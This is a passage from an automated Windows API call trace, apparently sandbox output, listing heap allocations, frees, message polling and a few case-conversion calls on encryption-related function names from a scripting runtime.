RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.478] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.478] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x79a3) returned 0xac2018 [0043.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0043.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x79a3) returned 0xad1378 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0043.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.481] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da368 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.481] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.482] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0043.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.482] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0043.483] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.484] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 